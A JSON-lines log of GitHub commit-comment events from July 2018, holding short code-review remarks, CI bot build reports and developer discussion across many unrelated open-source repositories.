{"id":"7971884580","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29723821,"position":10,"line":10,"path":"Lesson_1/right_triangle.rb","commit_id":"912cae520596fd822a6a73a767eac1d8fc8e2e19","created_at":"2018-07-16T16:52:02Z","updated_at":"2018-07-16T16:52:02Z","author_association":"NONE","body":"лучше избегать вложенных \"ифов\", можно переписать этот блок без вложенного условия в первой ветви"}},"created_at":"2018-07-16T16:52:02Z"}
{"id":"7971886465","type":"CommitCommentEvent","actor":{"login":"spullara"},"repo":{"name":"spullara/htsjdk"},"payload":{"comment":{"id":29723824,"position":4,"line":474,"path":"src/main/java/htsjdk/variant/vcf/AbstractVCFCodec.java","commit_id":"238d062ad1451acd6fdfecde4daf13c9b419a552","created_at":"2018-07-16T16:52:25Z","updated_at":"2018-07-16T16:52:25Z","author_association":"OWNER","body":"What is a typical cardinality for sizing the cache?"}},"created_at":"2018-07-16T16:52:25Z"}
{"id":"7971886660","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29723826,"position":15,"line":15,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T16:52:27Z","updated_at":"2018-07-16T16:52:27Z","author_association":"NONE","body":"Let's write the shorter version:\r\n\r\n``` chapel\r\ntemp_array[current_digit] += 1;\r\n```"}},"created_at":"2018-07-16T16:52:27Z"}
{"id":"7971887017","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29723827,"position":null,"line":null,"path":null,"commit_id":"0ee5ab8c71d569f7ffb64a7665431d252da887ca","created_at":"2018-07-16T16:52:31Z","updated_at":"2018-07-16T16:52:31Z","author_association":"COLLABORATOR","body":"<h3>add Example forceUpdate? prop to disable that behavior</h3>\n\nPreview: <strong><a href='https://18630-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18630-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18630-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-16T16:52:31Z"}
{"id":"7971889195","type":"CommitCommentEvent","actor":{"login":"carusogabriel"},"repo":{"name":"slevomat/coding-standard"},"payload":{"comment":{"id":29723828,"position":null,"line":null,"path":null,"commit_id":"fd5cb5b728d5770a362ce76e1ea7fd7fd02cf12c","created_at":"2018-07-16T16:52:55Z","updated_at":"2018-07-16T16:52:55Z","author_association":"CONTRIBUTOR","body":"In the first tests of this Sniff, we'll have an issue with `compact`:\r\n\r\n```php\r\nfunction returnsArray(): array {\r\n    $data = ['foo' => 1]; // This is generating an error, but we use it in compact\r\n\r\n    return compact('data');\r\n}\r\n```"}},"created_at":"2018-07-16T16:52:55Z"}
{"id":"7971890613","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29723831,"position":19,"line":19,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T16:53:14Z","updated_at":"2018-07-16T16:53:14Z","author_association":"NONE","body":"I think it's important to put a comment on this loop like \"Compute the starting index in the result array for each bucket\""}},"created_at":"2018-07-16T16:53:14Z"}
{"id":"7971890739","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29723832,"position":null,"line":null,"path":null,"commit_id":"3a874895461d648cecffb0dc76a039836c363df2","created_at":"2018-07-16T16:53:16Z","updated_at":"2018-07-16T16:53:16Z","author_association":"COLLABORATOR","body":"<h3>ignore angular directives \"pt-popover\", support template strings</h3>\n\nPreview: <strong><a href='https://18631-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18631-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18631-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-16T16:53:16Z"}
{"id":"7971890880","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29723833,"position":null,"line":null,"path":null,"commit_id":"4fa5218a11e67b17c0ed32fc3ca8279e831cc8f3","created_at":"2018-07-16T16:53:17Z","updated_at":"2018-07-16T16:53:17Z","author_association":"COLLABORATOR","body":"<h3>valid SPDX license identifier</h3>\n\nPreview: <strong><a href='https://18632-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18632-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18632-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-16T16:53:17Z"}
{"id":"7971891013","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29723834,"position":6,"line":4943,"path":"mono/metadata/marshal.c","commit_id":"f857b886cd043fa9c3a1d64e9d659906644d9afa","created_at":"2018-07-16T16:53:19Z","updated_at":"2018-07-16T16:53:19Z","author_association":"MEMBER","body":"This code makes no syscall & runs in just a few instructions. Suggest no gc mode change on any platform."}},"created_at":"2018-07-16T16:53:19Z"}
{"id":"7971894079","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29723838,"position":20,"line":20,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T16:53:57Z","updated_at":"2018-07-16T16:53:57Z","author_association":"NONE","body":"Let's write\r\n``` chapel\r\ntemp_array[i] += temp_array[i-1];\r\n```"}},"created_at":"2018-07-16T16:53:57Z"}
{"id":"7971899435","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29723845,"position":2,"line":2,"path":"Lesson_1/triangle_area.rb","commit_id":"110ffbc3ae3bd2b6b24e3decc58b57909c8bcf10","created_at":"2018-07-16T16:55:05Z","updated_at":"2018-07-16T16:55:05Z","author_association":"NONE","body":"здесь \"ретерн\" не нужен, в руби по умолчанию возвращается значение последней строки метода"}},"created_at":"2018-07-16T16:55:05Z"}
{"id":"7971901253","type":"CommitCommentEvent","actor":{"login":"mppf"},"repo":{"name":"avneet14027/Summer-2018"},"payload":{"comment":{"id":29723848,"position":32,"line":32,"path":"radixsort.chpl","commit_id":"ef941a8bc1c773dad4c6e3f3cb511d1bccce20eb","created_at":"2018-07-16T16:55:27Z","updated_at":"2018-07-16T16:55:27Z","author_association":"NONE","body":"I think it makes more sense for temp_array/counts to start from 0, and then you'd be adding to it rather than subtracting. That would make the sort \"stable\"."}},"created_at":"2018-07-16T16:55:27Z"}
{"id":"7971904687","type":"CommitCommentEvent","actor":{"login":"ghostrider-reborn"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29723855,"position":null,"line":null,"path":null,"commit_id":"017bdeb46ed0fe836606847dcec55ca1ae206794","created_at":"2018-07-16T16:56:10Z","updated_at":"2018-07-16T16:56:10Z","author_association":"MEMBER","body":"maybe you could remove lineage stuff as well, like lineage-sdk and lineageparts overlays\r\nwont make a great diff but its cleaner ;-)"}},"created_at":"2018-07-16T16:56:10Z"}
{"id":"7971907358","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"Fraizeraust/reactos"},"payload":{"comment":{"id":29723861,"position":null,"line":null,"path":null,"commit_id":"b7e3b6838303bbb2b016613ec3f54d7afe74fcc6","created_at":"2018-07-16T16:56:43Z","updated_at":"2018-07-16T16:56:43Z","author_association":"NONE","body":"https://github.com/reactos/reactos/blob/c2c66aff7dacc62d125f2cd61d1167e9a2aa3fd6/win32ss/user/ntuser/main.c#L607"}},"created_at":"2018-07-16T16:56:43Z"}
{"id":"7971908154","type":"CommitCommentEvent","actor":{"login":"yfarjoun"},"repo":{"name":"spullara/htsjdk"},"payload":{"comment":{"id":29723864,"position":4,"line":474,"path":"src/main/java/htsjdk/variant/vcf/AbstractVCFCodec.java","commit_id":"238d062ad1451acd6fdfecde4daf13c9b419a552","created_at":"2018-07-16T16:56:53Z","updated_at":"2018-07-16T16:56:53Z","author_association":"NONE","body":"If I understand correctly what you are doing, you want to avoid parsing ./. 0/0 0/1 1/1 over and over again. Anything else will likely be an anomaly, so I'd keep the cache small ~10 and that should be enough to collect the gains without paying a big memory cost.\r\n\r\n"}},"created_at":"2018-07-16T16:56:53Z"}
{"id":"7971908472","type":"CommitCommentEvent","actor":{"login":"hebarlift"},"repo":{"name":"hebarlift/programi_JP"},"payload":{"comment":{"id":29723865,"position":null,"line":null,"path":null,"commit_id":"8d3351ecf9949b3c487cd529d343ec463b22fbd1","created_at":"2018-07-16T16:56:57Z","updated_at":"2018-07-16T16:56:57Z","author_association":"OWNER","body":"Добавен ХебърСофт2013"}},"created_at":"2018-07-16T16:56:57Z"}
{"id":"7971908871","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29723866,"position":1,"line":1,"path":"Lesson_1/triangle_area.rb","commit_id":"110ffbc3ae3bd2b6b24e3decc58b57909c8bcf10","created_at":"2018-07-16T16:57:02Z","updated_at":"2018-07-16T16:57:02Z","author_association":"NONE","body":"здесь и далее везде:\r\nрекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\nк примеру данные переменные лучше было бы назвать `area`, `height`"}},"created_at":"2018-07-16T16:57:02Z"}
{"id":"7971910798","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29723868,"position":null,"line":null,"path":null,"commit_id":"837aa0b90bf6dacbc89e633f0e1c791745a29a1c","created_at":"2018-07-16T16:57:26Z","updated_at":"2018-07-16T16:57:26Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - i386-Windows-7-VisualStudio-14: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-68.35%25-red.png)</a> \n"}},"created_at":"2018-07-16T16:57:26Z"}
{"id":"7971917932","type":"CommitCommentEvent","actor":{"login":"aledjones"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29723881,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T16:58:55Z","updated_at":"2018-07-16T16:58:55Z","author_association":"OWNER","body":"> When would I need the bloated base image if the slim one works just as well? I've used node:alpine so far.  \r\n\r\nI just assumed you used the Dockerfile in the master branch. You are absolutely right.\r\n\r\n> Let's talk more of this.  \r\n\r\nSure thing. I started to toy around with db-rest as a possible candidate for being the core backbone of another, somewhat big project (We can talk about this more detailed in private if you want 😉 ). Soon after I came to the conclusion that db-rest is the only viable solution for our team. (Easy, basic, not to cluttered, gets the job done)\r\n\r\nI started to build a wrapper for myself in PHP (the repo is on my profile, its ugly and im not really proud of it, but it works). After that I wanted to visually present the gathered data in a nicer way; so I built a demo web app, [Trainmarks](https://trainmarks.xyz). As soon as some of my friends started to use the site on a regular basis, because each station could be easily access by a direct link and offered a departure table (who would have thought that a demo could be useful 😁 ), I saw some outages and smaller disruption in loading times. Also in my opinion was the refresh rate of the departure table with about 12 seconds far too long. I decided to fire up some instances on my Docker host and combine them with nginx’ load balancing feature. I think I used the `least_conn` option with nginx.  \r\nSince then the whole site got faster and I could easily drop the refresh rate of departure tables to 6 seconds which is nearly instant for this use-case.\r\n\r\nSince then the nodes have never caused any trouble or got blocked by the upstream API endpoints of Deutsche Bahn. It just works. 😄  \r\n\r\nLong story short: we will use db-rest for said project."}},"created_at":"2018-07-16T16:58:55Z"}
{"id":"7971919339","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29723888,"position":1,"line":1,"path":"Lesson_1/triangle_area.rb","commit_id":"110ffbc3ae3bd2b6b24e3decc58b57909c8bcf10","created_at":"2018-07-16T16:59:13Z","updated_at":"2018-07-16T16:59:13Z","author_association":"NONE","body":"конечно же, если речь идет о коэффициэнтах уравнения или сторонах треугольника, то буквенные названия будут вполне уместны )"}},"created_at":"2018-07-16T16:59:13Z"}
{"id":"7971923385","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":29723892,"position":19,"line":55,"path":"src/main/java/org/spongepowered/common/event/tracking/phase/packet/InventoryPacketContext.java","commit_id":"f0b0e71ad2e42ba125eeeb9f895e8f6bbac39bf9","created_at":"2018-07-16T17:00:01Z","updated_at":"2018-07-16T17:00:01Z","author_association":"MEMBER","body":"Can't use a switch since the states aren't enums ;) But yes, I'll be cleaning this up at some point."}},"created_at":"2018-07-16T17:00:01Z"}
{"id":"7971924635","type":"CommitCommentEvent","actor":{"login":"Julusian"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29723902,"position":null,"line":null,"path":null,"commit_id":"19e8b686c5b5653a35c77d4d9be9359e1e3ef7b5","created_at":"2018-07-16T17:00:17Z","updated_at":"2018-07-16T17:00:17Z","author_association":"COLLABORATOR","body":"> Any text input not working in console window.\r\n\r\nYep, I'm getting this too. Makes it very hard to close caspar too, neither ctrl-c or q are registering now"}},"created_at":"2018-07-16T17:00:17Z"}
{"id":"7971925572","type":"CommitCommentEvent","actor":{"login":"aledjones"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29723905,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T17:00:27Z","updated_at":"2018-07-16T17:00:27Z","author_association":"OWNER","body":"In the future I maybe try out some other load balancing techniques because of said project.\r\nMaybe some of that experience could also benefit this topic."}},"created_at":"2018-07-16T17:00:27Z"}
{"id":"7971927737","type":"CommitCommentEvent","actor":{"login":"smgallo"},"repo":{"name":"ubccr/xdmod"},"payload":{"comment":{"id":29723907,"position":29,"line":52,"path":"configuration/etl/etl_tables.d/cloud_eucalyptus/staging_event.json","commit_id":"4feed6d27cfda55335cc1f5e47dc44875ca251ec","created_at":"2018-07-16T17:00:53Z","updated_at":"2018-07-16T17:00:53Z","author_association":"MEMBER","body":"You removed the \"1\" here."}},"created_at":"2018-07-16T17:00:53Z"}
{"id":"7971929588","type":"CommitCommentEvent","actor":{"login":"paulKerckhove"},"repo":{"name":"kentcdodds/starwars-names"},"payload":{"comment":{"id":29723911,"position":110,"line":102,"path":"src/index.js","commit_id":"b59ad423441adb09470ae922c58fa1ea65cfa02f","created_at":"2018-07-16T17:01:15Z","updated_at":"2018-07-16T17:01:15Z","author_association":"NONE","body":"Hi ! I've just noticed that this part is `alert('Done')` from your package published on NPM, did you publish an older version or something ? \r\nIt would be cool to use the package with a log or even nothing !\r\n"}},"created_at":"2018-07-16T17:01:15Z"}
{"id":"7971929633","type":"CommitCommentEvent","actor":{"login":"spullara"},"repo":{"name":"spullara/htsjdk"},"payload":{"comment":{"id":29723912,"position":4,"line":474,"path":"src/main/java/htsjdk/variant/vcf/AbstractVCFCodec.java","commit_id":"238d062ad1451acd6fdfecde4daf13c9b419a552","created_at":"2018-07-16T17:01:15Z","updated_at":"2018-07-16T17:01:15Z","author_association":"OWNER","body":"An alternative may be to make it just cover those cases and just parse anomalous ones without caching them. "}},"created_at":"2018-07-16T17:01:15Z"}
{"id":"7971932832","type":"CommitCommentEvent","actor":{"login":"paulKerckhove"},"repo":{"name":"kentcdodds/starwars-names"},"payload":{"comment":{"id":29723915,"position":29,"line":21,"path":"src/index.js","commit_id":"b59ad423441adb09470ae922c58fa1ea65cfa02f","created_at":"2018-07-16T17:01:55Z","updated_at":"2018-07-16T17:01:55Z","author_association":"NONE","body":"Same here you published package is still live with theses lines if I'm correct. "}},"created_at":"2018-07-16T17:01:55Z"}
{"id":"7971937002","type":"CommitCommentEvent","actor":{"login":"bpaduch"},"repo":{"name":"ampproject/docs"},"payload":{"comment":{"id":29723926,"position":null,"line":null,"path":null,"commit_id":"8989d1e6f66f6b6671d8906713fd7857f51a3485","created_at":"2018-07-16T17:02:47Z","updated_at":"2018-07-16T17:02:47Z","author_association":"COLLABORATOR","body":"Master wasn't merged into Production (for some reason).  Doing it now."}},"created_at":"2018-07-16T17:02:47Z"}
{"id":"7971941871","type":"CommitCommentEvent","actor":{"login":"papiezak"},"repo":{"name":"sneakernets/DMXOPL"},"payload":{"comment":{"id":29723936,"position":null,"line":null,"path":null,"commit_id":"f54a1e94fdbc8da7ccf78f8dc05d4fd6eea7bb3f","created_at":"2018-07-16T17:03:44Z","updated_at":"2018-07-16T17:03:44Z","author_association":"CONTRIBUTOR","body":"It's as new as  e83c144, I was backporting every single commit you made. \r\n"}},"created_at":"2018-07-16T17:03:44Z"}
{"id":"7971950726","type":"CommitCommentEvent","actor":{"login":"alexischr"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29723950,"position":6,"line":4943,"path":"mono/metadata/marshal.c","commit_id":"f857b886cd043fa9c3a1d64e9d659906644d9afa","created_at":"2018-07-16T17:05:31Z","updated_at":"2018-07-16T17:05:31Z","author_association":"MEMBER","body":"How about GetLastError()?"}},"created_at":"2018-07-16T17:05:31Z"}
{"id":"7971957014","type":"CommitCommentEvent","actor":{"login":"dhakad97"},"repo":{"name":"dhakad97/chat-module"},"payload":{"comment":{"id":29723956,"position":null,"line":null,"path":null,"commit_id":"bdea0f4ddf31ec277b0b4d862621a698c188fa08","created_at":"2018-07-16T17:06:45Z","updated_at":"2018-07-16T17:06:45Z","author_association":"OWNER","body":"live demo <a href=\"http://socket-chat-online.herokuapp.com/\""}},"created_at":"2018-07-16T17:06:45Z"}
{"id":"7971958582","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29723960,"position":null,"line":null,"path":null,"commit_id":"6227bb9220794571b982080fb3de37128cfae718","created_at":"2018-07-16T17:07:04Z","updated_at":"2018-07-16T17:07:04Z","author_association":"MEMBER","body":"@AdSchellevis I need this to make it work, Npt doesn't set ipprotocol at all"}},"created_at":"2018-07-16T17:07:04Z"}
{"id":"7971963836","type":"CommitCommentEvent","actor":{"login":"jerjou"},"repo":{"name":"GoogleCloudPlatform/python-docs-samples"},"payload":{"comment":{"id":29723970,"position":null,"line":null,"path":null,"commit_id":"b0bd8e9ce6b1535c81715b35fed05cef2aa37cba","created_at":"2018-07-16T17:08:09Z","updated_at":"2018-07-16T17:08:09Z","author_association":"CONTRIBUTOR","body":"Oh interesting - you might be able to just add it to the list of exceptions in line 207."}},"created_at":"2018-07-16T17:08:09Z"}
{"id":"7971965747","type":"CommitCommentEvent","actor":{"login":"georgehazan"},"repo":{"name":"miranda-ng/miranda-ng"},"payload":{"comment":{"id":29723977,"position":null,"line":null,"path":null,"commit_id":"9b57db9ad61503ebf96a1b1f9a9e3ce687d242f1","created_at":"2018-07-16T17:08:33Z","updated_at":"2018-07-16T17:08:33Z","author_association":"MEMBER","body":"also fixes #1502"}},"created_at":"2018-07-16T17:08:33Z"}
{"id":"7971966353","type":"CommitCommentEvent","actor":{"login":"gizmocuz"},"repo":{"name":"domoticz/domoticz"},"payload":{"comment":{"id":29723982,"position":null,"line":null,"path":null,"commit_id":"154094bdbb2bedad79d5a9bc8336a7fb4fb290be","created_at":"2018-07-16T17:08:41Z","updated_at":"2018-07-16T17:08:41Z","author_association":"CONTRIBUTOR","body":"Found the real cause of the problem, should be solved in next build"}},"created_at":"2018-07-16T17:08:41Z"}
{"id":"7971967874","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29723986,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-16T17:08:59Z","updated_at":"2018-07-16T17:08:59Z","author_association":"NONE","body":"I actually set mine to update every frame as a test at one point and while it was definitely CPU expensive, it actually didn't really drop my FPS below 45 on my i7 6700k (running vsync so not sure how much the penalty actually was), at least not at the Orgrimmar/Dreamgrove target dummies anyhow, raid might have been a different story.  It was using an average of like 500ms+ per second of CPU time though.\r\n\r\n---\r\n\r\nThere's one other issue that I'd really like to fix, but not sure the best way to go about it.  The GCD (and only the GCD) starts before any information regarding what triggered it is available to the UI.  You can see this by making a macro that casts a spell with a cooldown then immediately pulls the cooldown for that spell from the API (even put one before it for good measure to see the difference).  The spell will have the GCD applied immediately after it's cast, but not it's normal cooldown.\r\n\r\n`UNIT_SPELLCAST_SENT` (and most other events) don't fire until about 150 to 200 ms _after_ the GCD has started.  This creates a very noticeable delay between the cooldown spiral starting, and the icon updating.  There are events fired (such as `ACTIONBAR_UPDATE_COOLDOWN` and other similar ones) but none that actually return any information.  \r\n\r\nOn my live copy, I reduced the visibility of this by changing OvaleCooldown to not update cooldowns with the three `_COOLDOWN` events but that's not really a great solution as it's merely masking the problem by (usually) not updating the cooldown till the `UNIT_SPELLCAST` events goes out.  Might not be solvable though, at least not in a way that's accurate enough."}},"created_at":"2018-07-16T17:08:59Z"}
{"id":"7971968452","type":"CommitCommentEvent","actor":{"login":"manishrjain"},"repo":{"name":"dgraph-io/tutorial"},"payload":{"comment":{"id":29723990,"position":null,"line":null,"path":null,"commit_id":"e6cc9eb6ffce42eca5c4c8c7ffe972321cf73f46","created_at":"2018-07-16T17:09:06Z","updated_at":"2018-07-16T17:09:06Z","author_association":"MEMBER","body":"Done. Looks like the update script had crashed."}},"created_at":"2018-07-16T17:09:06Z"}
{"id":"7971973164","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29724005,"position":6,"line":4943,"path":"mono/metadata/marshal.c","commit_id":"f857b886cd043fa9c3a1d64e9d659906644d9afa","created_at":"2018-07-16T17:10:04Z","updated_at":"2018-07-16T17:10:04Z","author_association":"MEMBER","body":"That is what I am talking about. GetLastError is one instruction, plus the call and ret, and not a syscall. It has been that way forever and always will be. It just reads a thread local.\r\n"}},"created_at":"2018-07-16T17:10:04Z"}
{"id":"7971977504","type":"CommitCommentEvent","actor":{"login":"IceNerd"},"repo":{"name":"gravytates/hello-android"},"payload":{"comment":{"id":29724017,"position":17,"line":57,"path":"app/src/main/res/layout/activity_main.xml","commit_id":"ef441a1336ff23fe06f46d2db6abf76cfb6dac26","created_at":"2018-07-16T17:10:57Z","updated_at":"2018-07-16T17:10:57Z","author_association":"NONE","body":"try  <EditText android:id=\"@+id/input_one\" <----  always id inputs\r\n         android:layout_height=\"120dp\"\r\n         android:layout_alignParentTop=\"true\"\r\n         android:layout_marginTop=\"390dp\"\r\n         android:background=\"#F8F8F8\"\r\n         android:text=\"@string/input_one\" />"}},"created_at":"2018-07-16T17:10:57Z"}
{"id":"7971977689","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29724019,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-16T17:11:00Z","updated_at":"2018-07-16T17:11:00Z","author_association":"NONE","body":"Oh, also we should be able to somehow automate a lot of the spell info updating.  Especially using something like the CASC/DBC extract made available by the simcraft team, but I'm not familiar enough with python and doing that kind of thing to do it."}},"created_at":"2018-07-16T17:11:00Z"}
{"id":"7971977703","type":"CommitCommentEvent","actor":{"login":"Synchro"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29724020,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-16T17:11:00Z","updated_at":"2018-07-16T17:11:00Z","author_association":"MEMBER","body":"I suspect that your *global* descriptor limit is set too low, so everything else with open files (e.g. apache) is eating all your FDs. See [this bug report](https://bugs.php.net/bug.php?id=69637). Take a look at [this article](https://www.tecmint.com/increase-set-open-file-limits-in-linux/) to see what your limits are set to , both globally and for your web server."}},"created_at":"2018-07-16T17:11:00Z"}
{"id":"7971979270","type":"CommitCommentEvent","actor":{"login":"yfarjoun"},"repo":{"name":"spullara/htsjdk"},"payload":{"comment":{"id":29724023,"position":4,"line":474,"path":"src/main/java/htsjdk/variant/vcf/AbstractVCFCodec.java","commit_id":"238d062ad1451acd6fdfecde4daf13c9b419a552","created_at":"2018-07-16T17:11:20Z","updated_at":"2018-07-16T17:11:20Z","author_association":"NONE","body":"Your call.\n\nOn Mon, Jul 16, 2018 at 1:01 PM Sam Pullara <notifications@github.com>\nwrote:\n\n> An alternative may be to make it just cover those cases and just parse\n> anomalous ones without caching them.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/spullara/htsjdk/commit/238d062ad1451acd6fdfecde4daf13c9b419a552#commitcomment-29723912>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACnk0tPVq5F4OQDbML9cZDqWtQRHmZ4Hks5uHMbbgaJpZM4VRdcZ>\n> .\n>\n"}},"created_at":"2018-07-16T17:11:20Z"}
{"id":"7971979628","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":29724024,"position":19,"line":55,"path":"src/main/java/org/spongepowered/common/event/tracking/phase/packet/InventoryPacketContext.java","commit_id":"f0b0e71ad2e42ba125eeeb9f895e8f6bbac39bf9","created_at":"2018-07-16T17:11:26Z","updated_at":"2018-07-16T17:11:26Z","author_association":"MEMBER","body":"Whoops, totally missed that lol."}},"created_at":"2018-07-16T17:11:26Z"}
{"id":"7971980112","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":29724025,"position":null,"line":null,"path":null,"commit_id":"e192e0a2f396c822fdee6f98b71cfd3276e822b2","created_at":"2018-07-16T17:11:33Z","updated_at":"2018-07-16T17:11:33Z","author_association":"MEMBER","body":"++ looks good"}},"created_at":"2018-07-16T17:11:33Z"}
{"id":"7971981959","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29724031,"position":null,"line":null,"path":null,"commit_id":"837aa0b90bf6dacbc89e633f0e1c791745a29a1c","created_at":"2018-07-16T17:11:57Z","updated_at":"2018-07-16T17:11:57Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: Build Failed\n\nMessages:\n\n * 623 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-68.35%25-red.png)</a> \n"}},"created_at":"2018-07-16T17:11:57Z"}
{"id":"7971984760","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29724037,"position":30,"line":132,"path":"mcs/class/corlib/System.Runtime.InteropServices/Marshal.cs","commit_id":"18b6846a3a2218525b7335a1f0515de93a1e44ca","created_at":"2018-07-16T17:12:33Z","updated_at":"2018-07-16T17:12:33Z","author_association":"MEMBER","body":"I see. This function doesn't quite follow the pattern of the surroundings. Had I optimized all of them to inline the call to ..fixed(...null) this wouldn't have happened. :("}},"created_at":"2018-07-16T17:12:33Z"}
{"id":"7971986548","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29724040,"position":null,"line":null,"path":null,"commit_id":"6227bb9220794571b982080fb3de37128cfae718","created_at":"2018-07-16T17:12:56Z","updated_at":"2018-07-16T17:12:56Z","author_association":"MEMBER","body":"BTW, I still see these:\r\n\r\n´´´\r\n# block in log quick on wan_stf from {<bogons>} to {any} label \"block bogon IPv4 networks from \"\r\n# block in log quick on wan_stf from {<bogonsv6>} to {any} label \"block bogon IPv6 networks from \"\r\n# block in log quick on wan_stf from {10.0.0.0/8,127.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,fc00::/7} to {any} label \"Block private networks from \"\r\n´´´\r\n\r\nLooks like it can't resolve wan_stf to wan?"}},"created_at":"2018-07-16T17:12:56Z"}
